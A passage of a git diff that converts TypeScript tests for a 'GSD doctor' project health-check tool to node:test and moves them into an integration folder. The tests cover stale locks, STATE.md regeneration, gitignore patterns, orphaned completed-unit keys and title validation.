  * doctor-runtime.test.ts — Tests for doctor runtime health checks.
  *
@@ -12,11 +14,7 @@ import { join } from "node:path";
 import { tmpdir } from "node:os";
 import { execSync } from "node:child_process";
 
-import { runGSDDoctor } from "../doctor.ts";
-import { createTestContext } from "./test-helpers.ts";
-
-const { assertEq, assertTrue, report } = createTestContext();
-
+import { runGSDDoctor } from "../../doctor.ts";
 function run(cmd: string, cwd: string): string {
   return execSync(cmd, { cwd, stdio: ["ignore", "pipe", "pipe"], encoding: "utf-8" }).trim();
 }
@@ -57,13 +55,12 @@ function createGitProject(): string {
   return dir;
 }
 
-async function main(): Promise<void> {
+describe('doctor-runtime', async () => {
   const cleanups: string[] = [];
 
   try {
     // ─── Test 1: Stale crash lock detection & fix ─────────────────────
-    console.log("\n=== stale_crash_lock ===");
-    {
+    test('stale_crash_lock', async () => {
       const dir = createMinimalProject();
       cleanups.push(dir);
 
@@ -80,29 +77,27 @@ async function main(): Promise<void> {
 
       const detect = await runGSDDoctor(dir);
       const lockIssues = detect.issues.filter(i => i.code === "stale_crash_lock");
-      assertTrue(lockIssues.length > 0, "detects stale crash lock");
-      assertTrue(lockIssues[0]?.message.includes("9999999"), "message includes PID");
-      assertTrue(lockIssues[0]?.fixable === true, "stale lock is fixable");
+      assert.ok(lockIssues.length > 0, "detects stale crash lock");
+      assert.ok(lockIssues[0]?.message.includes("9999999"), "message includes PID");
+      assert.ok(lockIssues[0]?.fixable === true, "stale lock is fixable");
 
       const fixed = await runGSDDoctor(dir, { fix: true });
-      assertTrue(fixed.fixesApplied.some(f => f.includes("cleared stale auto.lock")), "fix clears stale lock");
-      assertTrue(!existsSync(join(dir, ".gsd", "auto.lock")), "auto.lock removed after fix");
-    }
+      assert.ok(fixed.fixesApplied.some(f => f.includes("cleared stale auto.lock")), "fix clears stale lock");
+      assert.ok(!existsSync(join(dir, ".gsd", "auto.lock")), "auto.lock removed after fix");
+    });
 
     // ─── Test 2: No false positive for missing lock ───────────────────
-    console.log("\n=== stale_crash_lock — no false positive ===");
-    {
+    test('stale_crash_lock — no false positive', async () => {
       const dir = createMinimalProject();
       cleanups.push(dir);
 
       const detect = await runGSDDoctor(dir);
       const lockIssues = detect.issues.filter(i => i.code === "stale_crash_lock");
-      assertEq(lockIssues.length, 0, "no stale lock issue when no lock file exists");
-    }
+      assert.deepStrictEqual(lockIssues.length, 0, "no stale lock issue when no lock file exists");
+    });
 
     // ─── Test 3: Stale hook state detection & fix ─────────────────────
-    console.log("\n=== stale_hook_state ===");
-    {
+    test('stale_hook_state', async () => {
       const dir = createMinimalProject();
       cleanups.push(dir);
 
@@ -118,20 +113,19 @@ async function main(): Promise<void> {
 
       const detect = await runGSDDoctor(dir);
       const hookIssues = detect.issues.filter(i => i.code === "stale_hook_state");
-      assertTrue(hookIssues.length > 0, "detects stale hook state");
-      assertTrue(hookIssues[0]?.message.includes("2 residual cycle count"), "message includes count");
+      assert.ok(hookIssues.length > 0, "detects stale hook state");
+      assert.ok(hookIssues[0]?.message.includes("2 residual cycle count"), "message includes count");
 
       const fixed = await runGSDDoctor(dir, { fix: true });
-      assertTrue(fixed.fixesApplied.some(f => f.includes("cleared stale hook-state.json")), "fix clears hook state");
+      assert.ok(fixed.fixesApplied.some(f => f.includes("cleared stale hook-state.json")), "fix clears hook state");
 
       // Verify the file was cleaned
       const content = JSON.parse(readFileSync(join(dir, ".gsd", "hook-state.json"), "utf-8"));
-      assertEq(Object.keys(content.cycleCounts).length, 0, "hook state cycle counts cleared");
-    }
+      assert.deepStrictEqual(Object.keys(content.cycleCounts).length, 0, "hook state cycle counts cleared");
+    });
 
     // ─── Test 4: Activity log bloat detection ─────────────────────────
-    console.log("\n=== activity_log_bloat ===");
-    {
+    test('activity_log_bloat', async () => {
       const dir = createMinimalProject();
       cleanups.push(dir);
 
@@ -144,39 +138,37 @@ async function main(): Promise<void> {
 
       const detect = await runGSDDoctor(dir);
       const bloatIssues = detect.issues.filter(i => i.code === "activity_log_bloat");
-      assertTrue(bloatIssues.length > 0, "detects activity log bloat");
-      assertTrue(bloatIssues[0]?.message.includes("510 files"), "message includes file count");
-    }
+      assert.ok(bloatIssues.length > 0, "detects activity log bloat");
+      assert.ok(bloatIssues[0]?.message.includes("510 files"), "message includes file count");
+    });
 
     // ─── Test 5: STATE.md missing detection & fix ─────────────────────
-    console.log("\n=== state_file_missing ===");
-    {
+    test('state_file_missing', async () => {
       const dir = createMinimalProject();
       cleanups.push(dir);
 
       // No STATE.md exists by default in our minimal setup
       const stateFilePath = join(dir, ".gsd", "STATE.md");
-      assertTrue(!existsSync(stateFilePath), "STATE.md does not exist initially");
+      assert.ok(!existsSync(stateFilePath), "STATE.md does not exist initially");
 
       const detect = await runGSDDoctor(dir);
       const stateIssues = detect.issues.filter(i => i.code === "state_file_missing");
-      assertTrue(stateIssues.length > 0, "detects missing STATE.md");
-      assertTrue(stateIssues[0]?.fixable === true, "missing STATE.md is fixable");
-      assertEq(stateIssues[0]?.severity, "warning", "missing STATE.md is a warning (derived file)");
+      assert.ok(stateIssues.length > 0, "detects missing STATE.md");
+      assert.ok(stateIssues[0]?.fixable === true, "missing STATE.md is fixable");
+      assert.deepStrictEqual(stateIssues[0]?.severity, "warning", "missing STATE.md is a warning (derived file)");
 
       const fixed = await runGSDDoctor(dir, { fix: true });
-      assertTrue(fixed.fixesApplied.some(f => f.includes("created STATE.md")), "fix creates STATE.md");
-      assertTrue(existsSync(stateFilePath), "STATE.md exists after fix");
+      assert.ok(fixed.fixesApplied.some(f => f.includes("created STATE.md")), "fix creates STATE.md");
+      assert.ok(existsSync(stateFilePath), "STATE.md exists after fix");
 
       // Verify content has expected structure
       const content = readFileSync(stateFilePath, "utf-8");
-      assertTrue(content.includes("# GSD State"), "STATE.md has header");
-      assertTrue(content.includes("M001"), "STATE.md references milestone");
-    }
+      assert.ok(content.includes("# GSD State"), "STATE.md has header");
+      assert.ok(content.includes("M001"), "STATE.md references milestone");
+    });
 
     // ─── Test 6: STATE.md stale detection & fix ───────────────────────
-    console.log("\n=== state_file_stale ===");
-    {
+    test('state_file_stale', async () => {
       const dir = createMinimalProject();
       cleanups.push(dir);
 
@@ -202,21 +194,20 @@ None
 
       const detect = await runGSDDoctor(dir);
       const staleIssues = detect.issues.filter(i => i.code === "state_file_stale");
-      assertTrue(staleIssues.length > 0, "detects stale STATE.md");
-      assertTrue(staleIssues[0]?.message.includes("idle"), "message references old phase");
+      assert.ok(staleIssues.length > 0, "detects stale STATE.md");
+      assert.ok(staleIssues[0]?.message.includes("idle"), "message references old phase");
 
       const fixed = await runGSDDoctor(dir, { fix: true });
-      assertTrue(fixed.fixesApplied.some(f => f.includes("rebuilt STATE.md")), "fix rebuilds STATE.md");
+      assert.ok(fixed.fixesApplied.some(f => f.includes("rebuilt STATE.md")), "fix rebuilds STATE.md");
 
       // Verify updated content matches derived state
       const content = readFileSync(stateFilePath, "utf-8");
-      assertTrue(content.includes("M001"), "rebuilt STATE.md references milestone");
-    }
+      assert.ok(content.includes("M001"), "rebuilt STATE.md references milestone");
+    });
 
     // ─── Test 7: Gitignore missing patterns detection & fix ───────────
     if (process.platform !== "win32") {
-    console.log("\n=== gitignore_missing_patterns ===");
-    {
+    test('gitignore_missing_patterns', async () => {
       const dir = createGitProject();
       cleanups.push(dir);
 
@@ -230,24 +221,22 @@ None
 
       const detect = await runGSDDoctor(dir);
       const gitignoreIssues = detect.issues.filter(i => i.code === "gitignore_missing_patterns");
-      assertTrue(gitignoreIssues.length > 0, "detects missing gitignore patterns");
-      assertTrue(gitignoreIssues[0]?.message.includes(".gsd"), "message lists missing .gsd pattern");
+      assert.ok(gitignoreIssues.length > 0, "detects missing gitignore patterns");
+      assert.ok(gitignoreIssues[0]?.message.includes(".gsd"), "message lists missing .gsd pattern");
 
       const fixed = await runGSDDoctor(dir, { fix: true });
-      assertTrue(fixed.fixesApplied.some(f => f.includes("added missing GSD runtime patterns")), "fix adds patterns");
+      assert.ok(fixed.fixesApplied.some(f => f.includes("added missing GSD runtime patterns")), "fix adds patterns");
 
       // Verify .gsd entry was added (external state symlink)
       const content = readFileSync(join(dir, ".gitignore"), "utf-8");
-      assertTrue(content.includes(".gsd"), "gitignore now has .gsd entry");
-    }
+      assert.ok(content.includes(".gsd"), "gitignore now has .gsd entry");
+    });
     } else {
-      console.log("\n=== gitignore_missing_patterns (skipped on Windows) ===");
     }
 
     // ─── Test 8: No false positive when gitignore has blanket .gsd/ ───
     if (process.platform !== "win32") {
-    console.log("\n=== gitignore — blanket .gsd/ ===");
-    {
+    test('gitignore — blanket .gsd/', async () => {
       const dir = createGitProject();
       cleanups.push(dir);
 
@@ -258,15 +247,13 @@ node_modules/
 
       const detect = await runGSDDoctor(dir);
       const gitignoreIssues = detect.issues.filter(i => i.code === "gitignore_missing_patterns");
-      assertEq(gitignoreIssues.length, 0, "no missing patterns when blanket .gsd/ present");
-    }
+      assert.deepStrictEqual(gitignoreIssues.length, 0, "no missing patterns when blanket .gsd/ present");
+    });
     } else {
-      console.log("\n=== gitignore — blanket .gsd/ (skipped on Windows) ===");
     }
 
     // ─── Test 9: Orphaned completed-units detection & fix ─────────────
-    console.log("\n=== orphaned_completed_units ===");
-    {
+    test('orphaned_completed_units', async () => {
       const dir = createMinimalProject();
       cleanups.push(dir);
 
@@ -279,24 +266,23 @@ node_modules/
 
       const detect = await runGSDDoctor(dir);
       const orphanIssues = detect.issues.filter(i => i.code === "orphaned_completed_units");
-      assertTrue(orphanIssues.length > 0, "detects orphaned completed-unit keys");
-      assertTrue(orphanIssues[0]?.message.includes("2 completed-unit key"), "message includes count");
+      assert.ok(orphanIssues.length > 0, "detects orphaned completed-unit keys");
+      assert.ok(orphanIssues[0]?.message.includes("2 completed-unit key"), "message includes count");
 
       const fixed = await runGSDDoctor(dir, { fix: true });
-      assertTrue(fixed.fixesApplied.some(f => f.includes("removed") && f.includes("orphaned")), "fix removes orphaned keys");
+      assert.ok(fixed.fixesApplied.some(f => f.includes("removed") && f.includes("orphaned")), "fix removes orphaned keys");
 
       // Verify keys were cleaned
       const content = JSON.parse(readFileSync(join(dir, ".gsd", "completed-units.json"), "utf-8"));
-      assertEq(content.length, 0, "all orphaned keys removed");
-    }
+      assert.deepStrictEqual(content.length, 0, "all orphaned keys removed");
+    });
 
     // ─── Test: Stranded lock directory detection & fix ────────────────
     // Skip on Windows: proper-lockfile uses advisory file locking on Windows,
     // not the directory-based mechanism. The .gsd.lock/ directory pattern is
     // a POSIX-specific lockfile implementation detail.
     if (process.platform !== "win32") {
-    console.log("\n=== stranded_lock_directory ===");
-    {
+    test('stranded_lock_directory', async () => {
       const dir = createMinimalProject();
       cleanups.push(dir);
 
@@ -307,21 +293,20 @@ node_modules/
 
       const detect = await runGSDDoctor(dir);
       const strandedIssues = detect.issues.filter(i => i.code === "stranded_lock_directory");
-      assertTrue(strandedIssues.length > 0, "detects stranded lock directory");
-      assertTrue(strandedIssues[0]?.message.includes("lock directory"), "message describes stranded lock directory");
-      assertTrue(strandedIssues[0]?.fixable === true, "stranded lock dir is fixable");
+      assert.ok(strandedIssues.length > 0, "detects stranded lock directory");
+      assert.ok(strandedIssues[0]?.message.includes("lock directory"), "message describes stranded lock directory");
+      assert.ok(strandedIssues[0]?.fixable === true, "stranded lock dir is fixable");
 
       const fixed = await runGSDDoctor(dir, { fix: true });
-      assertTrue(
+      assert.ok(
         fixed.fixesApplied.some(f => f.includes("removed stranded lock directory")),
         "fix removes stranded lock directory",
       );
-      assertTrue(!existsSync(lockDir), "lock directory removed after fix");
-    }
+      assert.ok(!existsSync(lockDir), "lock directory removed after fix");
+    });
 
     // ─── Test: Stranded lock dir with live lock holder — NOT flagged ───
-    console.log("\n=== stranded_lock_directory (live holder not flagged) ===");
-    {
+    test('stranded_lock_directory (live holder not flagged)', async () => {
       const dir = createMinimalProject();
       cleanups.push(dir);
 
@@ -340,18 +325,16 @@ node_modules/
 
       const detect = await runGSDDoctor(dir);
       const strandedIssues = detect.issues.filter(i => i.code === "stranded_lock_directory");
-      assertEq(strandedIssues.length, 0, "live lock holder: stranded_lock_directory NOT detected");
-    }
+      assert.deepStrictEqual(strandedIssues.length, 0, "live lock holder: stranded_lock_directory NOT detected");
+    });
     } else {
-      console.log("\n=== stranded_lock_directory (skipped on Windows) ===");
     }
 
     // ─── Test: orphaned_completed_units NOT auto-fixed at fixLevel="task" (#1809) ──
     // Regression: task-level doctor was removing completed-unit keys whose artifacts
     // were temporarily missing, causing deriveState to revert the user to S01 and
     // effectively discarding hours of work.
-    console.log("\n=== orphaned_completed_units protected at fixLevel=task (#1809) ===");
-    {
+    test('orphaned_completed_units protected at fixLevel=task (#1809)', async () => {
       const dir = createMinimalProject();
       cleanups.push(dir);
 
@@ -366,33 +349,29 @@ node_modules/
       // fixLevel="task" — the level used by auto-post-unit after every task
       const taskLevelFix = await runGSDDoctor(dir, { fix: true, fixLevel: "task" });
       const taskLevelOrphan = taskLevelFix.issues.filter(i => i.code === "orphaned_completed_units");
-      assertTrue(taskLevelOrphan.length > 0, "orphaned_completed_units detected at task fixLevel");
+      assert.ok(taskLevelOrphan.length > 0, "orphaned_completed_units detected at task fixLevel");
 
       // Verify keys were NOT removed — the fix must be suppressed at task level
       const afterTaskFix = JSON.parse(readFileSync(join(dir, ".gsd", "completed-units.json"), "utf-8"));
-      assertEq(afterTaskFix.length, 2, "completed-unit keys preserved at fixLevel=task (data loss prevention)");
-      assertTrue(
+      assert.deepStrictEqual(afterTaskFix.length, 2, "completed-unit keys preserved at fixLevel=task (data loss prevention)");
+      assert.ok(
         !taskLevelFix.fixesApplied.some(f => f.includes("orphaned")),
         "no orphaned-units fix applied at fixLevel=task",
       );
 
       // fixLevel="all" (explicit manual doctor) — fix SHOULD apply
       const allLevelFix = await runGSDDoctor(dir, { fix: true, fixLevel: "all" });
-      assertTrue(
+      assert.ok(
         allLevelFix.fixesApplied.some(f => f.includes("orphaned")),
         "orphaned-units fix applied at fixLevel=all (manual doctor)",
       );
       const afterAllFix = JSON.parse(readFileSync(join(dir, ".gsd", "completed-units.json"), "utf-8"));
-      assertEq(afterAllFix.length, 0, "orphaned keys removed at fixLevel=all");
-    }
+      assert.deepStrictEqual(afterAllFix.length, 0, "orphaned keys removed at fixLevel=all");
+    });
 
   } finally {
     for (const dir of cleanups) {
       try { rmSync(dir, { recursive: true, force: true }); } catch { /* ignore */ }
     }
   }
-
-  report();
-}
-
-main();
+});
diff --git a/src/resources/extensions/gsd/tests/doctor.test.ts b/src/resources/extensions/gsd/tests/integration/doctor.test.ts
similarity index 72%
rename from src/resources/extensions/gsd/tests/doctor.test.ts
rename to src/resources/extensions/gsd/tests/integration/doctor.test.ts
index efad6088b..7eb482c85 100644
--- a/src/resources/extensions/gsd/tests/doctor.test.ts
+++ b/src/resources/extensions/gsd/tests/integration/doctor.test.ts
@@ -1,11 +1,10 @@
+import { after, describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 import { mkdtempSync, mkdirSync, readFileSync, rmSync, writeFileSync, existsSync } from "node:fs";
 import { join } from "node:path";
 import { tmpdir } from "node:os";
 
-import { formatDoctorReport, runGSDDoctor, summarizeDoctorIssues, filterDoctorIssues, selectDoctorScope, validateTitle } from "../doctor.js";
-import { createTestContext } from './test-helpers.ts';
-
-const { assertEq, assertTrue, report } = createTestContext();
+import { formatDoctorReport, runGSDDoctor, summarizeDoctorIssues, filterDoctorIssues, selectDoctorScope, validateTitle } from "../../doctor.js";
 const tmpBase = mkdtempSync(join(tmpdir(), "gsd-doctor-test-"));
 const gsd = join(tmpBase, ".gsd");
 const mDir = join(gsd, "milestones", "M001");
@@ -61,56 +60,41 @@ Implemented.
 - log
 `);
 
-async function main(): Promise<void> {
-  console.log("\n=== doctor diagnose ===");
-  {
+describe('doctor', async () => {
+  test('doctor diagnose', async () => {
     const report = await runGSDDoctor(tmpBase, { fix: false });
-    assertTrue(!report.ok, "report is not ok when completion artifacts are missing");
-    assertTrue(report.issues.some(issue => issue.code === "all_tasks_done_missing_slice_summary"), "detects missing slice summary");
-    assertTrue(report.issues.some(issue => issue.code === "all_tasks_done_missing_slice_uat"), "detects missing slice UAT");
-  }
+    // Reconciliation issue codes have been removed — doctor should NOT report them
+    assert.ok(!report.issues.some(issue => issue.code === "all_tasks_done_missing_slice_summary" as any), "does not report removed code all_tasks_done_missing_slice_summary");
+    assert.ok(!report.issues.some(issue => issue.code === "all_tasks_done_missing_slice_uat" as any), "does not report removed code all_tasks_done_missing_slice_uat");
+    assert.ok(!report.issues.some(issue => issue.code === "all_tasks_done_roadmap_not_checked" as any), "does not report removed code all_tasks_done_roadmap_not_checked");
+  });
 
-  console.log("\n=== doctor formatting ===");
-  {
+  test('doctor formatting', async () => {
     const report = await runGSDDoctor(tmpBase, { fix: false });
     const summary = summarizeDoctorIssues(report.issues);
-    assertEq(summary.errors, 2, "two blocking errors in summary");
     const scoped = filterDoctorIssues(report.issues, { scope: "M001/S01", includeWarnings: true });
-    assertTrue(scoped.length >= 2, "scope filter keeps slice issues");
     const text = formatDoctorReport(report, { scope: "M001/S01", includeWarnings: true, maxIssues: 5 });
-    assertTrue(text.includes("Scope: M001/S01"), "formatted report shows scope");
-    assertTrue(text.includes("Top issue types:"), "formatted report shows grouped issue types");
-  }
+    assert.ok(text.includes("Scope: M001/S01"), "formatted report shows scope");
+  });
 
-  console.log("\n=== doctor default scope ===");
-  {
+  test('doctor default scope', async () => {
     const scope = await selectDoctorScope(tmpBase);
-    assertEq(scope, "M001/S01", "default doctor scope targets the active slice");
-  }
+    assert.deepStrictEqual(scope, "M001/S01", "default doctor scope targets the active slice");
+  });
 
-  console.log("\n=== doctor fix ===");
-  {
+  test('doctor fix', async () => {
     const report = await runGSDDoctor(tmpBase, { fix: true });
-    if (report.fixesApplied.length < 3) console.error(report);
-    assertTrue(report.fixesApplied.length >= 3, "applies multiple fixes");
-    assertTrue(existsSync(join(sDir, "S01-SUMMARY.md")), "creates placeholder slice summary");
-    assertTrue(existsSync(join(sDir, "S01-UAT.md")), "creates placeholder UAT");
+    // With reconciliation removed, doctor no longer creates placeholder summaries,
+    // UAT files, or marks checkboxes. It only applies infrastructure fixes.
+    // The task checkbox marking (task_summary_without_done_checkbox) is also removed.
+    // Just verify it doesn't crash and produces a report.
+    assert.ok(report.issues !== undefined, "doctor produces a report with issues array");
+  });
 
-    const plan = readFileSync(join(sDir, "S01-PLAN.md"), "utf-8");
-    assertTrue(plan.includes("- [x] **T01:"), "marks task checkbox done");
-
-    const roadmap = readFileSync(join(mDir, "M001-ROADMAP.md"), "utf-8");
-    assertTrue(roadmap.includes("- [x] **S01:"), "marks slice checkbox done");
-
-    const state = readFileSync(join(gsd, "STATE.md"), "utf-8");
-    assertTrue(state.includes("# GSD State"), "writes state file");
-  }
-
-  rmSync(tmpBase, { recursive: true, force: true });
+  after(() => rmSync(tmpBase, { recursive: true, force: true }));
 
   // ─── Milestone summary detection: missing summary ──────────────────────
-  console.log("\n=== doctor detects missing milestone summary ===");
-  {
+  test('doctor detects missing milestone summary', async () => {
     const msBase = mkdtempSync(join(tmpdir(), "gsd-doctor-ms-test-"));
     const msGsd = join(msBase, ".gsd");
     const msMDir = join(msGsd, "milestones", "M001");
@@ -163,22 +147,21 @@ parent: M001
     // NO milestone summary — this is the condition we're detecting
 
     const report = await runGSDDoctor(msBase, { fix: false });
-    assertTrue(
+    assert.ok(
       report.issues.some(issue => issue.code === "all_slices_done_missing_milestone_summary"),
       "detects missing milestone summary when all slices are done"
     );
     const msIssue = report.issues.find(issue => issue.code === "all_slices_done_missing_milestone_summary");
-    assertEq(msIssue?.scope, "milestone", "milestone summary issue has scope 'milestone'");
-    assertEq(msIssue?.severity, "warning", "milestone summary issue has severity 'warning'");
-    assertEq(msIssue?.unitId, "M001", "milestone summary issue unitId is 'M001'");
-    assertTrue(msIssue?.message?.includes("SUMMARY") ?? false, "milestone summary issue message mentions SUMMARY");
+    assert.deepStrictEqual(msIssue?.scope, "milestone", "milestone summary issue has scope 'milestone'");
+    assert.deepStrictEqual(msIssue?.severity, "warning", "milestone summary issue has severity 'warning'");
+    assert.deepStrictEqual(msIssue?.unitId, "M001", "milestone summary issue unitId is 'M001'");
+    assert.ok(msIssue?.message?.includes("SUMMARY") ?? false, "milestone summary issue message mentions SUMMARY");
 
     rmSync(msBase, { recursive: true, force: true });
-  }
+  });
 
   // ─── Milestone summary detection: summary present (no false positive) ──
-  console.log("\n=== doctor does NOT flag milestone with summary ===");
-  {
+  test('doctor does NOT flag milestone with summary', async () => {
     const msBase = mkdtempSync(join(tmpdir(), "gsd-doctor-ms-ok-test-"));
     const msGsd = join(msBase, ".gsd");
     const msMDir = join(msGsd, "milestones", "M001");
@@ -228,17 +211,16 @@ parent: M001
     writeFileSync(join(msMDir, "M001-SUMMARY.md"), `# M001 Summary\n\nMilestone complete.`);
 
     const report = await runGSDDoctor(msBase, { fix: false });
-    assertTrue(
+    assert.ok(
       !report.issues.some(issue => issue.code === "all_slices_done_missing_milestone_summary"),
       "does NOT report missing milestone summary when summary exists"
     );
 
     rmSync(msBase, { recursive: true, force: true });
-  }
+  });
 
   // ─── blocker_discovered_no_replan detection ────────────────────────────
-  console.log("\n=== doctor detects blocker_discovered_no_replan ===");
-  {
+  test('doctor detects blocker_discovered_no_replan', async () => {
     const bBase = mkdtempSync(join(tmpdir(), "gsd-doctor-blocker-test-"));
     const bGsd = join(bBase, ".gsd");
     const bMDir = join(bGsd, "milestones", "M001");
@@ -294,18 +276,17 @@ Discovered an issue.
     // No REPLAN.md — should trigger the issue
     const report = await runGSDDoctor(bBase, { fix: false });
     const blockerIssues = report.issues.filter(i => i.code === "blocker_discovered_no_replan");
-    assertTrue(blockerIssues.length > 0, "detects blocker_discovered_no_replan");
-    assertEq(blockerIssues[0]?.severity, "warning", "blocker issue has warning severity");
-    assertEq(blockerIssues[0]?.scope, "slice", "blocker issue has slice scope");
-    assertTrue(blockerIssues[0]?.message?.includes("T01") ?? false, "blocker issue message mentions T01");
-    assertTrue(blockerIssues[0]?.message?.includes("S01") ?? false, "blocker issue message mentions S01");
+    assert.ok(blockerIssues.length > 0, "detects blocker_discovered_no_replan");
+    assert.deepStrictEqual(blockerIssues[0]?.severity, "warning", "blocker issue has warning severity");
+    assert.deepStrictEqual(blockerIssues[0]?.scope, "slice", "blocker issue has slice scope");
+    assert.ok(blockerIssues[0]?.message?.includes("T01") ?? false, "blocker issue message mentions T01");
+    assert.ok(blockerIssues[0]?.message?.includes("S01") ?? false, "blocker issue message mentions S01");
 
     rmSync(bBase, { recursive: true, force: true });
-  }
+  });
 
   // ─── blocker_discovered with REPLAN.md (no false positive) ─────────────
-  console.log("\n=== doctor does NOT flag blocker when REPLAN.md exists ===");
-  {
+  test('doctor does NOT flag blocker when REPLAN.md exists', async () => {
     const bBase = mkdtempSync(join(tmpdir(), "gsd-doctor-blocker-ok-test-"));
     const bGsd = join(bBase, ".gsd");
     const bMDir = join(bGsd, "milestones", "M001");
@@ -355,14 +336,13 @@ Discovered an issue.
 
     const report = await runGSDDoctor(bBase, { fix: false });
     const blockerIssues = report.issues.filter(i => i.code === "blocker_discovered_no_replan");
-    assertEq(blockerIssues.length, 0, "no blocker_discovered_no_replan when REPLAN.md exists");
+    assert.deepStrictEqual(blockerIssues.length, 0, "no blocker_discovered_no_replan when REPLAN.md exists");
 
     rmSync(bBase, { recursive: true, force: true });
-  }
+  });
 
   // ─── Must-have verification: all addressed → no issue ─────────────────
-  console.log("\n=== doctor: done task with must-haves all addressed → no issue ===");
-  {
+  test('doctor: done task with must-haves all addressed → no issue', async () => {
     const mhBase = mkdtempSync(join(tmpdir(), "gsd-doctor-mh-ok-"));
     const mhGsd = join(mhBase, ".gsd");
     const mhMDir = join(mhGsd, "milestones", "M001");
@@ -380,17 +360,16 @@ Discovered an issue.
     writeFileSync(join(mhTDir, "T01-SUMMARY.md"), `---\nid: T01\nparent: S01\nmilestone: M001\n---\n# T01: Implement\n\n## What Happened\nAdded parseWidgets function. Unit tests pass with zero failures.\n`);
 
     const report = await runGSDDoctor(mhBase, { fix: false });
-    assertTrue(
+    assert.ok(
       !report.issues.some(i => i.code === "task_done_must_haves_not_verified"),
       "no must-have issue when all must-haves are addressed"
     );
 
     rmSync(mhBase, { recursive: true, force: true });
-  }
+  });
 
   // ─── Must-have verification: not addressed → warning fired ───────────
-  console.log("\n=== doctor: done task with must-haves NOT addressed → warning ===");
-  {
+  test('doctor: done task with must-haves NOT addressed → warning', async () => {
     const mhBase = mkdtempSync(join(tmpdir(), "gsd-doctor-mh-fail-"));
     const mhGsd = join(mhBase, ".gsd");
     const mhMDir = join(mhGsd, "milestones", "M001");
@@ -409,19 +388,18 @@ Discovered an issue.
 
     const report = await runGSDDoctor(mhBase, { fix: false });
     const mhIssue = report.issues.find(i => i.code === "task_done_must_haves_not_verified");
-    assertTrue(!!mhIssue, "must-have issue is fired when summary doesn't address all must-haves");
-    assertEq(mhIssue?.severity, "warning", "must-have issue is warning severity");
-    assertEq(mhIssue?.scope, "task", "must-have issue scope is task");
-    assertTrue(mhIssue?.message?.includes("3 must-haves") ?? false, "message mentions total must-have count");
-    assertTrue(mhIssue?.message?.includes("only 1") ?? false, "message mentions addressed count");
-    assertEq(mhIssue?.fixable, false, "must-have issue is not fixable");
+    assert.ok(!!mhIssue, "must-have issue is fired when summary doesn't address all must-haves");
+    assert.deepStrictEqual(mhIssue?.severity, "warning", "must-have issue is warning severity");
+    assert.deepStrictEqual(mhIssue?.scope, "task", "must-have issue scope is task");
+    assert.ok(mhIssue?.message?.includes("3 must-haves") ?? false, "message mentions total must-have count");
+    assert.ok(mhIssue?.message?.includes("only 1") ?? false, "message mentions addressed count");
+    assert.deepStrictEqual(mhIssue?.fixable, false, "must-have issue is not fixable");
 
     rmSync(mhBase, { recursive: true, force: true });
-  }
+  });
 
   // ─── Must-have verification: no task plan → no issue ─────────────────
-  console.log("\n=== doctor: done task with no task plan file → no issue ===");
-  {
+  test('doctor: done task with no task plan file → no issue', async () => {
     const mhBase = mkdtempSync(join(tmpdir(), "gsd-doctor-mh-noplan-"));
     const mhGsd = join(mhBase, ".gsd");
     const mhMDir = join(mhGsd, "milestones", "M001");
@@ -436,17 +414,16 @@ Discovered an issue.
     writeFileSync(join(mhTDir, "T01-SUMMARY.md"), `---\nid: T01\nparent: S01\nmilestone: M001\n---\n# T01: Implement\n\n## What Happened\nDone.\n`);
 
     const report = await runGSDDoctor(mhBase, { fix: false });
-    assertTrue(
+    assert.ok(
       !report.issues.some(i => i.code === "task_done_must_haves_not_verified"),
       "no must-have issue when task plan file doesn't exist"
     );
 
     rmSync(mhBase, { recursive: true, force: true });
-  }
+  });
 
   // ─── Must-have verification: plan exists but no Must-Haves section → no issue
-  console.log("\n=== doctor: done task with plan but no Must-Haves section → no issue ===");
-  {
+  test('doctor: done task with plan but no Must-Haves section → no issue', async () => {
     const mhBase = mkdtempSync(join(tmpdir(), "gsd-doctor-mh-nosect-"));
     const mhGsd = join(mhBase, ".gsd");
     const mhMDir = join(mhGsd, "milestones", "M001");
@@ -463,55 +440,49 @@ Discovered an issue.
     writeFileSync(join(mhTDir, "T01-SUMMARY.md"), `---\nid: T01\nparent: S01\nmilestone: M001\n---\n# T01: Implement\n\n## What Happened\nDone.\n`);
 
     const report = await runGSDDoctor(mhBase, { fix: false });
-    assertTrue(
+    assert.ok(
       !report.issues.some(i => i.code === "task_done_must_haves_not_verified"),
       "no must-have issue when task plan has no Must-Haves section"
     );
 
     rmSync(mhBase, { recursive: true, force: true });
-  }
+  });
 
   // ─── validateTitle: em dash and slash detection ────────────────────────
-  console.log("\n=== validateTitle: returns null for clean titles ===");
-  {
-    assertEq(validateTitle("Foundation"), null, "clean title passes");
-    assertEq(validateTitle("Build Core Systems"), null, "clean title with spaces passes");
-    assertEq(validateTitle("API v2 Integration"), null, "clean title with version passes");
-    assertEq(validateTitle(""), null, "empty title passes");
-  }
+  test('validateTitle: returns null for clean titles', () => {
+    assert.deepStrictEqual(validateTitle("Foundation"), null, "clean title passes");
+    assert.deepStrictEqual(validateTitle("Build Core Systems"), null, "clean title with spaces passes");
+    assert.deepStrictEqual(validateTitle("API v2 Integration"), null, "clean title with version passes");
+    assert.deepStrictEqual(validateTitle(""), null, "empty title passes");
+  });
 
-  console.log("\n=== validateTitle: detects em dash ===");
-  {
+  test('validateTitle: detects em dash', () => {
     const result = validateTitle("Foundation — Build Core");
-    assertTrue(result !== null, "detects em dash in title");
-    assertTrue(result!.includes("em/en dash"), "message mentions em/en dash");
-  }
+    assert.ok(result !== null, "detects em dash in title");
+    assert.ok(result!.includes("em/en dash"), "message mentions em/en dash");
+  });
 
-  console.log("\n=== validateTitle: detects en dash ===");
-  {
+  test('validateTitle: detects en dash', () => {
     const result = validateTitle("Phase 1 – Phase 2");
-    assertTrue(result !== null, "detects en dash in title");
-    assertTrue(result!.includes("em/en dash"), "message mentions em/en dash for en dash");
-  }
+    assert.ok(result !== null, "detects en dash in title");
+    assert.ok(result!.includes("em/en dash"), "message mentions em/en dash for en dash");
+  });
 
-  console.log("\n=== validateTitle: detects forward slash ===");
-  {
+  test('validateTitle: detects forward slash', () => {
     const result = validateTitle("Client/Server");
-    assertTrue(result !== null, "detects forward slash in title");
-    assertTrue(result!.includes("forward slash"), "message mentions forward slash");
-  }
+    assert.ok(result !== null, "detects forward slash in title");
+    assert.ok(result!.includes("forward slash"), "message mentions forward slash");
+  });
 
-  console.log("\n=== validateTitle: detects both em dash and slash ===");
-  {
+  test('validateTitle: detects both em dash and slash', () => {
     const result = validateTitle("Client — Server/API");
-    assertTrue(result !== null, "detects both delimiters");
